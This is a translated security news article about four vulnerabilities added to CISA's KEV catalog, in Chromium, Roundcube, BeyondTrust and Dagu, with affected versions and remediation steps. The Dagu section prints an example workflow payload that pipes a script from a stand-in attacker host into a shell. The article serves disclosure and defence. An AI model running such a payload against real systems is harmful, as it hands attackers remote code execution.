Translated from the original Japanese article
Tech 6 min read

Four Critical Vulnerabilities Added to CISA KEV (From a Chromium Zero-Day to Default RCE)

Security Vulnerabilities CISA KEV RCE Zero-Day Chromium Roundcube BeyondTrust

Multiple critical vulnerabilities were added to CISA’s Known Exploited Vulnerabilities (KEV) catalog in quick succession during the same week. They span a browser, a webmail client, a privileged access management tool, and a workflow engine — different targets, but all are confirmed exploited or have public PoCs and require immediate action.

Chromium CVE-2026-2441: CSS Engine UAF Zero-Day

Overview

CVE-2026-2441 is a use-after-free (UAF) vulnerability in Chromium’s CSS engine. It has already been added to CISA’s KEV catalog, and exploit code is circulating.

A UAF is a bug where freed heap memory is referenced again, allowing an attacker to execute arbitrary code with the user’s privileges. Simply opening a malicious HTML page is enough to trigger the attack.

Affected browsers

BrowserFixed versions
Google Chrome145.0.7632.75/76 (Windows/macOS), 144.0.7559.75 (Linux)
Microsoft EdgePatched release available
BravePatched release available
OperaPatched release available

Safari uses WebKit and Firefox uses Gecko, so they are not affected.

Remediation

Check versions at chrome://settings/help for Chrome and edge://settings/help for Edge. In enterprise environments, prioritize patch deployment to managed devices at the highest level.

Chromium’s rendering engine, Blink, implements complex CSS processing in C++. Dynamic state changes such as cascading, inheritance, and animations can make object lifetime management error-prone. UAFs in the CSS engine have been reported repeatedly in the past, making it a major attack surface alongside the JavaScript engine.

Adding something to the KEV catalog means exploitation has been observed in the wild. If you leave it unpatched, you will get burned.

Roundcube CVE-2025-49113: CVSS 9.9 RCE That Lurked for 10+ Years

Overview

FieldValue
CVECVE-2025-49113
CVSS score9.9 (Critical)
Vulnerability typeDeserialization of untrusted data
ExploitationActive in-the-wild exploitation confirmed

The _from parameter in program/actions/settings/upload.php is not properly validated, allowing an authenticated user to execute arbitrary code on the server.

Weaponized within 48 hours of patch release

Reported by Dubai-based security company FearsOff and patched in June 2025. Attackers weaponized exploits within 48 hours of the patch release. The flaw had been present in the codebase for over a decade. If it can be weaponized within 48 hours, there is effectively no grace period for applying patches.

Additionally, CVE-2025-68461 (CVSS 7.2, XSS via the SVG animate tag) was added to KEV on the same day and was patched in December 2025.

Why Roundcube is targeted

Roundcube is an open-source webmail client widely adopted by European government and diplomatic organizations. It has been targeted in campaigns by APT28 (aka Fancy Bear/GRU) and Winter Vivern against European government entities and think tanks. The actor behind the KEV-listed case is unknown, but the targeting pattern aligns with past activity.

Response checklist

  1. Verify the Roundcube version in use
  2. CVE-2025-49113: Apply the patch released in June 2025
  3. CVE-2025-68461: Apply the patch released in December 2025
  4. Check authentication logs for suspicious upload operations
  5. Prioritize upgrading to the latest stable release

With the KEV addition, U.S. Federal Civilian Executive Branch (FCEB) agencies are required to remediate by March 13, 2026.

Primary source: CISA KEV catalog

BeyondTrust CVE-2026-1731: CVSS 9.9 Currently Abused in Ransomware Campaigns

Overview

FieldValue
CVECVE-2026-1731
CVSS score9.9 (Critical)
Affected productsBeyondTrust Remote Support (RS), Privileged Remote Access (PRA)
Attack pathWebSocket interface
CISA catalogListed in KEV (ransomware exploitation confirmed)

Through the WebSocket interface, attackers can inject and execute arbitrary shell commands via the thin-scc-wrapper script. According to Palo Alto Networks’ Unit 42, taking over this account enables full control of the appliance’s configuration, management sessions, and network traffic.

Observed attack chain

Unit 42 documented a multi-stage attack sequence:

  1. Gain access to an administrator account using a custom Python script
  2. Deploy a fileless PHP backdoor (evades disk-based scanning)
  3. Establish a persistent web shell with a Bash dropper and install VShell and Spark RAT
  4. Compress configuration files and PostgreSQL dumps and exfiltrate them

Targeted sectors include finance, legal, technology, higher education, wholesale/retail, and healthcare. Affected regions include the U.S., France, Germany, Australia, and Canada. Because BeyondTrust is a core privileged access management product, compromise can have organization-wide blast radius.

Recurring vulnerabilities in the same product

BeyondTrust has previously had CVE-2024-12356, which was exploited by the China-nexus threat actor “Silk Typhoon.” Unit 42 notes that input validation issues have recurred across different code execution paths. When the same class of bug reappears in the same product, it points to a design problem.

Remediation steps

  1. Apply BeyondTrust’s latest patches immediately
  2. Review WebSocket access logs and thin-scc-wrapper execution history
  3. Look for traces of PostgreSQL dump operations
  4. Search for suspicious PHP files and Bash scripts, and for VShell/Spark RAT communications
  5. Audit for admin accounts that were added or modified without authorization
  6. Also verify remediation for CVE-2024-12356

Original article: BeyondTrust Flaw Used for Web Shells, Backdoors, and Data Exfiltration

Dagu GHSA-6QR9-G2XW-CW92: RCE via Unauthenticated Default API (CVSS 9.8)

Overview

A CVSS 9.8 vulnerability has been found in the Go-based workflow engine Dagu. In the default configuration, API endpoints have no authentication, allowing remote execution of arbitrary shell commands. A proof of concept is publicly available.

Dagu is a lightweight workflow engine written in Go, used as a cron alternative for CI/CD and data pipelines.

How the attack works

By default, the /api/v1/dags endpoint is exposed without authentication. This endpoint accepts a DAG definition (YAML file) and runs it. An attacker can execute arbitrary commands on the host by sending a simple HTTP POST like this:

steps:
  - name: malicious-step
    command: /bin/sh
    args:
      - -c
      - "curl attacker.com/shell.sh | sh"

Authentication does exist, but it requires an explicit setting and is disabled by default. This maps to CWE-306, “Missing Authentication for Critical Function.”

ElementAssessment
Attack vectorNetwork (no local access required)
Attack complexityLow
Required authenticationNone
Impact scopeHigh impact to confidentiality, integrity, and availability

Remediation

Upgrading to a fixed version is the top priority. The fix adds authMiddleware, inserting authentication checks on API endpoints. After updating, verify that API access returns 401 Unauthorized.

As a stopgap, you can enable authentication in the config file:

# config.yaml
auth:
  mode: builtin
  basic:
    username: your_username
    password: your_password

Additionally, restrict Dagu’s API port (8080 by default) at the firewall, and run Dagu as a non-privileged user to limit blast radius. When Dagu runs in a Kubernetes cluster or a shared development environment, it can become a foothold for lateral movement.

Reference: GHSA-6QR9-G2XW-CW92